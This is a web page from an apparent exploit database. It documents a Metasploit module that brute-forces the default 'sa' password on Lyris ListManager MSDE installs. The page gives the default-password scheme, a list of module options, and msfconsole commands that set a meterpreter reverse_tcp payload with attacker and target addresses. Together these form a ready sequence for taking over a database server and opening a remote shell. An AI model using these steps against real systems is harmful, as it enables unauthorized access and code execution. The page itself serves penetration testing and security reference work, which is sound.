Lyris ListManager MSDE Weak sa Password | Metasploit Exploit Database (DB)

Lyris ListManager MSDE Weak sa Password

This module exploits a weak password vulnerability in the Lyris ListManager MSDE install. During installation, the 'sa' account password is set to 'lminstall'. Once the install completes, it is set to 'lyris' followed by the process ID of the installer. This module brute forces all possible process IDs that would be used by the installer.

Search Other Modules


Exploit Rank

  • Excellent

Exploit Authors

  • hdm < hdm [at] metasploit.com >

Vulnerability References


Exploit Targets

  • 0 - Automatic (default)

Exploit Development


Similar Exploit Modules


Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/mssql/lyris_listmanager_weak_pass
msf exploit(lyris_listmanager_weak_pass) > show payloads
msf exploit(lyris_listmanager_weak_pass) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(lyris_listmanager_weak_pass) > set LHOST [MY IP ADDRESS]
msf exploit(lyris_listmanager_weak_pass) > set RHOST [TARGET IP]
msf exploit(lyris_listmanager_weak_pass) > exploit


Exploit Module Options

PASSWORD The password for the specified username (default: )
RHOST The target address
RPORT The target port (default: 1433)
USERNAME The username to authenticate as (default: sa)
USE_WINDOWS_AUTHENT Use windows authentification
CHOST The local client address
CPORT The local client port
ConnectTimeout Maximum number of seconds to establish a TCP connection
ContextInformationFile The information file that contains context information
DOMAIN The domain to use for windows authentication
DisablePayloadHandler Disable the handler code for the selected payload
EXE::Custom Use custom exe instead of automatically generating a payload exe
EXE::FallBack Use the default template in case the specified one is missing
EXE::Inject Set to preserve the original EXE function
EXE::OldMethod Set to use the substitution EXE generation method.
EXE::Path The directory in which to look for the executable template
EXE::Template The executable template file name.
EnableContextEncoding Use transient context when encoding payloads
HEX2BINARY The path to the hex2binary script on the disk
NTLM::SendLM Always send the LANMAN response (except when NTLMv2_session is specified)
NTLM::SendNTLM Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
NTLM::SendSPN Send an avp of type SPN in the ntlmv2 client Blob, this allow authentification on windows Seven/2008r2 when SPN is required
NTLM::UseLMKey Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
NTLM::UseNTLM2_session Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
NTLM::UseNTLMv2 Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
Proxies Use a proxy chain
SSL Negotiate SSL for outgoing connections
SSLVersion Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session
TCP::max_send_size Maxiumum tcp segment size. (0 = disable)
TCP::send_delay Delays inserted before every send. (0 = disable)